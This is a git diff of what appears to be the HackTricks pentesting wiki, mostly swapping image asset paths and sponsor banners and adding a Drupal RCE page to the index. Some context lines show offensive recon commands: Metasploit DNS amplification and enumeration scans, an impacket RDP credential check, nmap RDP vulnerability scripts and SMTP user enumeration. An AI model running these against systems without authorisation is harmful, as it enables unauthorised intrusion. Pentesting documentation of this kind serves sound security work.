diff --git a/.gitbook/assets/image (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1).png
index ee3722524..e70bceed6 100644
Binary files a/.gitbook/assets/image (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (1) (1).png b/.gitbook/assets/image (1) (1).png
index e70bceed6..d798d9edc 100644
Binary files a/.gitbook/assets/image (1) (1).png and b/.gitbook/assets/image (1) (1).png differ
diff --git a/.gitbook/assets/image (1).png b/.gitbook/assets/image (1).png
index d798d9edc..1ec78aebd 100644
Binary files a/.gitbook/assets/image (1).png and b/.gitbook/assets/image (1).png differ
diff --git a/.gitbook/assets/image (10) (1).png b/.gitbook/assets/image (10) (1).png
index d3370cd6f..00fb8b946 100644
Binary files a/.gitbook/assets/image (10) (1).png and b/.gitbook/assets/image (10) (1).png differ
diff --git a/.gitbook/assets/image (10).png b/.gitbook/assets/image (10).png
index 00fb8b946..210d7bd3f 100644
Binary files a/.gitbook/assets/image (10).png and b/.gitbook/assets/image (10).png differ
diff --git a/.gitbook/assets/image (11) (1).png b/.gitbook/assets/image (11) (1).png
index 78cc16af3..70fe9294a 100644
Binary files a/.gitbook/assets/image (11) (1).png and b/.gitbook/assets/image (11) (1).png differ
diff --git a/.gitbook/assets/image (11).png b/.gitbook/assets/image (11).png
index 70fe9294a..277c44d2c 100644
Binary files a/.gitbook/assets/image (11).png and b/.gitbook/assets/image (11).png differ
diff --git a/.gitbook/assets/image (12) (1).png b/.gitbook/assets/image (12) (1).png
index c29de7533..1a985c3d4 100644
Binary files a/.gitbook/assets/image (12) (1).png and b/.gitbook/assets/image (12) (1).png differ
diff --git a/.gitbook/assets/image (12).png b/.gitbook/assets/image (12).png
index 1a985c3d4..fd5fec3d9 100644
Binary files a/.gitbook/assets/image (12).png and b/.gitbook/assets/image (12).png differ
diff --git a/.gitbook/assets/image (13) (1).png b/.gitbook/assets/image (13) (1).png
index 474931f56..cee86ab50 100644
Binary files a/.gitbook/assets/image (13) (1).png and b/.gitbook/assets/image (13) (1).png differ
diff --git a/.gitbook/assets/image (13).png b/.gitbook/assets/image (13).png
index cee86ab50..4c2c4ab67 100644
Binary files a/.gitbook/assets/image (13).png and b/.gitbook/assets/image (13).png differ
diff --git a/.gitbook/assets/image (14) (1).png b/.gitbook/assets/image (14) (1).png
index 5edd2e9f5..e0b33932e 100644
Binary files a/.gitbook/assets/image (14) (1).png and b/.gitbook/assets/image (14) (1).png differ
diff --git a/.gitbook/assets/image (14).png b/.gitbook/assets/image (14).png
index e0b33932e..f5207ab5b 100644
Binary files a/.gitbook/assets/image (14).png and b/.gitbook/assets/image (14).png differ
diff --git a/.gitbook/assets/image (15) (1).png b/.gitbook/assets/image (15) (1).png
index fed36b16d..e0b33932e 100644
Binary files a/.gitbook/assets/image (15) (1).png and b/.gitbook/assets/image (15) (1).png differ
diff --git a/.gitbook/assets/image (15).png b/.gitbook/assets/image (15).png
index e0b33932e..11fd861cf 100644
Binary files a/.gitbook/assets/image (15).png and b/.gitbook/assets/image (15).png differ
diff --git a/.gitbook/assets/image (16) (1).png b/.gitbook/assets/image (16) (1).png
index b3a5bfb51..354be02ad 100644
Binary files a/.gitbook/assets/image (16) (1).png and b/.gitbook/assets/image (16) (1).png differ
diff --git a/.gitbook/assets/image (16).png b/.gitbook/assets/image (16).png
index 354be02ad..5d7f744a6 100644
Binary files a/.gitbook/assets/image (16).png and b/.gitbook/assets/image (16).png differ
diff --git a/.gitbook/assets/image (17) (1).png b/.gitbook/assets/image (17) (1).png
index 1b412b105..6856b34b8 100644
Binary files a/.gitbook/assets/image (17) (1).png and b/.gitbook/assets/image (17) (1).png differ
diff --git a/.gitbook/assets/image (17).png b/.gitbook/assets/image (17).png
index 6856b34b8..3b1e0666a 100644
Binary files a/.gitbook/assets/image (17).png and b/.gitbook/assets/image (17).png differ
diff --git a/.gitbook/assets/image (2) (1).png b/.gitbook/assets/image (2) (1).png
index 70413c7ff..82f1650c7 100644
Binary files a/.gitbook/assets/image (2) (1).png and b/.gitbook/assets/image (2) (1).png differ
diff --git a/.gitbook/assets/image (2).png b/.gitbook/assets/image (2).png
index 82f1650c7..176e28e26 100644
Binary files a/.gitbook/assets/image (2).png and b/.gitbook/assets/image (2).png differ
diff --git a/.gitbook/assets/image (3) (1).png b/.gitbook/assets/image (3) (1).png
index 2c0467343..f2f640d8c 100644
Binary files a/.gitbook/assets/image (3) (1).png and b/.gitbook/assets/image (3) (1).png differ
diff --git a/.gitbook/assets/image (3).png b/.gitbook/assets/image (3).png
index f2f640d8c..17acb7d7e 100644
Binary files a/.gitbook/assets/image (3).png and b/.gitbook/assets/image (3).png differ
diff --git a/.gitbook/assets/image (4) (1) (1).png b/.gitbook/assets/image (4) (1) (1).png
index 8f2e02767..ffd8adf04 100644
Binary files a/.gitbook/assets/image (4) (1) (1).png and b/.gitbook/assets/image (4) (1) (1).png differ
diff --git a/.gitbook/assets/image (4) (1).png b/.gitbook/assets/image (4) (1).png
index ffd8adf04..ee3722524 100644
Binary files a/.gitbook/assets/image (4) (1).png and b/.gitbook/assets/image (4) (1).png differ
diff --git a/.gitbook/assets/image (4).png b/.gitbook/assets/image (4).png
index ee3722524..92ceed745 100644
Binary files a/.gitbook/assets/image (4).png and b/.gitbook/assets/image (4).png differ
diff --git a/.gitbook/assets/image (5) (1) (1).png b/.gitbook/assets/image (5) (1) (1).png
index 8f87ed9e5..b2c2c3d26 100644
Binary files a/.gitbook/assets/image (5) (1) (1).png and b/.gitbook/assets/image (5) (1) (1).png differ
diff --git a/.gitbook/assets/image (5) (1).png b/.gitbook/assets/image (5) (1).png
index b2c2c3d26..70413c7ff 100644
Binary files a/.gitbook/assets/image (5) (1).png and b/.gitbook/assets/image (5) (1).png differ
diff --git a/.gitbook/assets/image (5).png b/.gitbook/assets/image (5).png
index 70413c7ff..e7f03abf8 100644
Binary files a/.gitbook/assets/image (5).png and b/.gitbook/assets/image (5).png differ
diff --git a/.gitbook/assets/image (6) (1).png b/.gitbook/assets/image (6) (1).png
index 8f87ed9e5..3646dc3f3 100644
Binary files a/.gitbook/assets/image (6) (1).png and b/.gitbook/assets/image (6) (1).png differ
diff --git a/.gitbook/assets/image (6).png b/.gitbook/assets/image (6).png
index 3646dc3f3..e5ab74cb8 100644
Binary files a/.gitbook/assets/image (6).png and b/.gitbook/assets/image (6).png differ
diff --git a/.gitbook/assets/image (7) (1).png b/.gitbook/assets/image (7) (1).png
index a75850811..13854046c 100644
Binary files a/.gitbook/assets/image (7) (1).png and b/.gitbook/assets/image (7) (1).png differ
diff --git a/.gitbook/assets/image (7).png b/.gitbook/assets/image (7).png
index 13854046c..511d74528 100644
Binary files a/.gitbook/assets/image (7).png and b/.gitbook/assets/image (7).png differ
diff --git a/.gitbook/assets/image (8) (1).png b/.gitbook/assets/image (8) (1).png
index 066cf2ec8..6c2c20ea1 100644
Binary files a/.gitbook/assets/image (8) (1).png and b/.gitbook/assets/image (8) (1).png differ
diff --git a/.gitbook/assets/image (8).png b/.gitbook/assets/image (8).png
index 6c2c20ea1..4464dc171 100644
Binary files a/.gitbook/assets/image (8).png and b/.gitbook/assets/image (8).png differ
diff --git a/.gitbook/assets/image (9) (1).png b/.gitbook/assets/image (9) (1).png
index d8f7dcb75..2c0467343 100644
Binary files a/.gitbook/assets/image (9) (1).png and b/.gitbook/assets/image (9) (1).png differ
diff --git a/.gitbook/assets/image (9).png b/.gitbook/assets/image (9).png
index 2c0467343..a3d5f99f0 100644
Binary files a/.gitbook/assets/image (9).png and b/.gitbook/assets/image (9).png differ
diff --git a/.gitbook/assets/image.png b/.gitbook/assets/image.png
index 3b1e0666a..4c7c93f13 100644
Binary files a/.gitbook/assets/image.png and b/.gitbook/assets/image.png differ
diff --git a/README.md b/README.md
index 771bbe95f..2635faf75 100644
--- a/README.md
+++ b/README.md
@@ -79,7 +79,7 @@ Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to
 
 ### [Pentest-Tools.com](https://pentest-tools.com/) - The essential penetration testing toolkit
 
-<figure><img src=".gitbook/assets/image (15).png" alt=""><figcaption></figcaption></figure>
+<figure><img src=".gitbook/assets/image (15) (1).png" alt=""><figcaption></figcaption></figure>
 
 **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
 
@@ -89,7 +89,7 @@ Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to
 
 ### [SerpApi](https://serpapi.com/)
 
-<figure><img src=".gitbook/assets/image (5).png" alt=""><figcaption></figcaption></figure>
+<figure><img src=".gitbook/assets/image (5) (1).png" alt=""><figcaption></figcaption></figure>
 
 SerpApi offers fast and easy real-time APIs to **access search engine results**. They scrape search engines, handle proxies, solve captchas, and parse all rich structured data for you.
 
diff --git a/SUMMARY.md b/SUMMARY.md
index 9c3525572..edb46a455 100644
--- a/SUMMARY.md
+++ b/SUMMARY.md
@@ -373,7 +373,8 @@
     * [Firebase Database](network-services-pentesting/pentesting-web/buckets/firebase-database.md)
   * [CGI](network-services-pentesting/pentesting-web/cgi.md)
   * [DotNetNuke (DNN)](network-services-pentesting/pentesting-web/dotnetnuke-dnn.md)
-  * [Drupal](network-services-pentesting/pentesting-web/drupal.md)
+  * [Drupal](network-services-pentesting/pentesting-web/drupal/README.md)
+    * [Drupal RCE](network-services-pentesting/pentesting-web/drupal/drupal-rce.md)
   * [Electron Desktop Apps](network-services-pentesting/pentesting-web/electron-desktop-apps/README.md)
     * [Electron contextIsolation RCE via preload code](network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-preload-code.md)
     * [Electron contextIsolation RCE via Electron internal code](network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md)
diff --git a/binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.md b/binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.md
index 68cce870b..47356ba53 100644
--- a/binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.md
+++ b/binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.md
@@ -40,7 +40,7 @@ This gadget basically allows to confirm that something interesting was executed
 
 This technique uses the [**ret2csu**](ret2csu.md) gadget. And this is because if you access this gadget in the middle of some instructions you get gadgets to control **`rsi`** and **`rdi`**:
 
-<figure><img src="../../.gitbook/assets/image (1).png" alt="" width="278"><figcaption><p><a href="https://www.scs.stanford.edu/brop/bittau-brop.pdf">https://www.scs.stanford.edu/brop/bittau-brop.pdf</a></p></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1) (1).png" alt="" width="278"><figcaption><p><a href="https://www.scs.stanford.edu/brop/bittau-brop.pdf">https://www.scs.stanford.edu/brop/bittau-brop.pdf</a></p></figcaption></figure>
 
 These would be the gadgets:
 
diff --git a/binary-exploitation/rop-return-oriented-programing/ret2csu.md b/binary-exploitation/rop-return-oriented-programing/ret2csu.md
index a93a71e2f..d935b617f 100644
--- a/binary-exploitation/rop-return-oriented-programing/ret2csu.md
+++ b/binary-exploitation/rop-return-oriented-programing/ret2csu.md
@@ -87,7 +87,7 @@ gef➤  search-pattern 0x400560
 
 Another way to control **`rdi`** and **`rsi`** from the ret2csu gadget is by accessing it specific offsets:
 
-<figure><img src="../../.gitbook/assets/image (2).png" alt="" width="283"><figcaption><p><a href="https://www.scs.stanford.edu/brop/bittau-brop.pdf">https://www.scs.stanford.edu/brop/bittau-brop.pdf</a></p></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (2) (1).png" alt="" width="283"><figcaption><p><a href="https://www.scs.stanford.edu/brop/bittau-brop.pdf">https://www.scs.stanford.edu/brop/bittau-brop.pdf</a></p></figcaption></figure>
 
 Check this page for more info:
 
diff --git a/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md b/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md
index 125322a17..7bbb35e38 100644
--- a/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md
+++ b/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md
@@ -156,7 +156,7 @@ int main(int argc, char **argv) {
 
 In the section **`vdso`** it's possible to find a call to **`sigreturn`** in the offset **`0x7b0`**:
 
-<figure><img src="../../../.gitbook/assets/image.png" alt="" width="563"><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (17).png" alt="" width="563"><figcaption></figcaption></figure>
 
 Therefore, if leaked, it's possible to **use this address to access a `sigreturn`** if the binary isn't loading it:
 
diff --git a/generic-methodologies-and-resources/external-recon-methodology/README.md b/generic-methodologies-and-resources/external-recon-methodology/README.md
index df1d46bc7..64b01ee49 100644
--- a/generic-methodologies-and-resources/external-recon-methodology/README.md
+++ b/generic-methodologies-and-resources/external-recon-methodology/README.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
@@ -730,7 +730,7 @@ There are several tools out there that will perform part of the proposed actions
 
 * All free courses of [**@Jhaddix**](https://twitter.com/Jhaddix) like [**The Bug Hunter's Methodology v4.0 - Recon Edition**](https://www.youtube.com/watch?v=p4JgIu1mceI)
 
-<figure><img src="../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
diff --git a/generic-methodologies-and-resources/pentesting-methodology.md b/generic-methodologies-and-resources/pentesting-methodology.md
index 21863df48..937e09f0d 100644
--- a/generic-methodologies-and-resources/pentesting-methodology.md
+++ b/generic-methodologies-and-resources/pentesting-methodology.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
@@ -150,7 +150,7 @@ Check also the page about [**NTLM**](../windows-hardening/ntlm/), it could be ve
 * [**CBC-MAC**](../crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md)
 * [**Padding Oracle**](../crypto-and-stego/padding-oracle-priv.md)
 
-<figure><img src="../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
diff --git a/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/README.md b/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/README.md
index 925db79a2..3718738d4 100644
--- a/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/README.md
+++ b/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/README.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
@@ -133,7 +133,7 @@ However, in this kind of containers these protections will usually exist, but yo
 
 You can find **examples** on how to **exploit some RCE vulnerabilities** to get scripting languages **reverse shells** and execute binaries from memory in [**https://github.com/carlospolop/DistrolessRCE**](https://github.com/carlospolop/DistrolessRCE).
 
-<figure><img src="../../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
diff --git a/network-services-pentesting/pentesting-dns.md b/network-services-pentesting/pentesting-dns.md
index 5b84ea518..5db81b661 100644
--- a/network-services-pentesting/pentesting-dns.md
+++ b/network-services-pentesting/pentesting-dns.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
 
 **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
 
@@ -201,7 +201,7 @@ dig google.com A @<IP>
 
 ![](<../.gitbook/assets/image (146).png>)
 
-<figure><img src="../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
 
 **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
 
@@ -322,7 +322,7 @@ Entry_6:
   Command: msfconsole -q -x 'use auxiliary/scanner/dns/dns_amp; set RHOSTS {IP}; set RPORT 53; run; exit' && msfconsole -q -x 'use auxiliary/gather/enum_dns; set RHOSTS {IP}; set RPORT 53; run; exit' 
 ```
 
-<figure><img src="../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
 
 **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
 
diff --git a/network-services-pentesting/pentesting-rdp.md b/network-services-pentesting/pentesting-rdp.md
index 270b140cc..015e6b631 100644
--- a/network-services-pentesting/pentesting-rdp.md
+++ b/network-services-pentesting/pentesting-rdp.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
 
 **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
 
@@ -75,7 +75,7 @@ rdp\_check.py from impacket let you check if some credentials are valid for a RD
 rdp_check <domain>/<name>:<password>@<IP>
 ```
 
-<figure><img src="../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
 
 **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
 
@@ -168,7 +168,7 @@ Entry_2:
   Command: nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 {IP}
 ```
 
-<figure><img src="../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
 
 **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
 
diff --git a/network-services-pentesting/pentesting-remote-gdbserver.md b/network-services-pentesting/pentesting-remote-gdbserver.md
index 2f3b59698..c9e7230d5 100644
--- a/network-services-pentesting/pentesting-remote-gdbserver.md
+++ b/network-services-pentesting/pentesting-remote-gdbserver.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
 
 **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
 
@@ -199,7 +199,7 @@ RemoteCmd()
 ```
 {% endcode %}
 
-<figure><img src="../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
 
 **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
 
diff --git a/network-services-pentesting/pentesting-smtp/README.md b/network-services-pentesting/pentesting-smtp/README.md
index c83ff37e5..d65dd0be3 100644
--- a/network-services-pentesting/pentesting-smtp/README.md
+++ b/network-services-pentesting/pentesting-smtp/README.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
 
 **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
 
@@ -188,7 +188,7 @@ smtp-user-enum: smtp-user-enum -M <MODE> -u <USER> -t <IP>
 Nmap: nmap --script smtp-enum-users <IP>
 ```
 
-<figure><img src="../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
 
 **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
 
@@ -625,7 +625,7 @@ Entry_8:
 
 ```
 
-<figure><img src="../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
 
 **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
 
diff --git a/network-services-pentesting/pentesting-smtp/smtp-commands.md b/network-services-pentesting/pentesting-smtp/smtp-commands.md
index 2a8dd7bcb..bfa699e1a 100644
--- a/network-services-pentesting/pentesting-smtp/smtp-commands.md
+++ b/network-services-pentesting/pentesting-smtp/smtp-commands.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
 
 **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
 
@@ -61,7 +61,7 @@ It’s a client’s request for some information that can be useful for the a su
 **QUIT**\
 It terminates the SMTP conversation.
 
-<figure><img src="../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
 
 **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
 
diff --git a/network-services-pentesting/pentesting-smtp/smtp-smuggling.md b/network-services-pentesting/pentesting-smtp/smtp-smuggling.md
index b66196007..9ea75aa8d 100644
--- a/network-services-pentesting/pentesting-smtp/smtp-smuggling.md
+++ b/network-services-pentesting/pentesting-smtp/smtp-smuggling.md
@@ -22,7 +22,7 @@ This type of vulnerability was [**originally discovered in this post**](https://
 
 This is because in the SMTP protocol, the **data of the message** to be sent in the email is controlled by a user (attacker) which could send specially crafted data abusing differences in parsers that will smuggle extra emails in the receptor. Take a look to this illustrated example from the original post:
 
-<figure><img src="../../.gitbook/assets/image (8).png" alt=""><figcaption><p><a href="https://sec-consult.com/fileadmin/user_upload/sec-consult/Dynamisch/Blogartikel/2023_12/SMTP_Smuggling-Overview__09_.png">https://sec-consult.com/fileadmin/user_upload/sec-consult/Dynamisch/Blogartikel/2023_12/SMTP_Smuggling-Overview__09_.png</a></p></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (8) (1).png" alt=""><figcaption><p><a href="https://sec-consult.com/fileadmin/user_upload/sec-consult/Dynamisch/Blogartikel/2023_12/SMTP_Smuggling-Overview__09_.png">https://sec-consult.com/fileadmin/user_upload/sec-consult/Dynamisch/Blogartikel/2023_12/SMTP_Smuggling-Overview__09_.png</a></p></figcaption></figure>
 
 ### How
 
diff --git a/network-services-pentesting/pentesting-snmp/README.md b/network-services-pentesting/pentesting-snmp/README.md
index cb4e39f7d..7e2d77e7e 100644
--- a/network-services-pentesting/pentesting-snmp/README.md
+++ b/network-services-pentesting/pentesting-snmp/README.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
@@ -260,7 +260,7 @@ If there is an ACL that only allows some IPs to query the SMNP service, you can
 * snmpd.conf
 * snmp-config.xml
 
-<figure><img src="../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
diff --git a/network-services-pentesting/pentesting-snmp/cisco-snmp.md b/network-services-pentesting/pentesting-snmp/cisco-snmp.md
index 8161c6562..9bb61797b 100644
--- a/network-services-pentesting/pentesting-snmp/cisco-snmp.md
+++ b/network-services-pentesting/pentesting-snmp/cisco-snmp.md
@@ -12,7 +12,7 @@
 
 </details>
 
-<figure><img src="../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
@@ -53,7 +53,7 @@ msf6 auxiliary(scanner/snmp/snmp_enum) > exploit
 
 * [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)
 
-<figure><img src="../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
diff --git a/network-services-pentesting/pentesting-telnet.md b/network-services-pentesting/pentesting-telnet.md
index 75eaa580a..9c00ef372 100644
--- a/network-services-pentesting/pentesting-telnet.md
+++ b/network-services-pentesting/pentesting-telnet.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
 
 **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
 
@@ -94,7 +94,7 @@ Entry_4:
   
 ```
 
-<figure><img src="../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
 
 **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
 
diff --git a/network-services-pentesting/pentesting-web/403-and-401-bypasses.md b/network-services-pentesting/pentesting-web/403-and-401-bypasses.md
index ed1608220..f7b4e6fbf 100644
--- a/network-services-pentesting/pentesting-web/403-and-401-bypasses.md
+++ b/network-services-pentesting/pentesting-web/403-and-401-bypasses.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
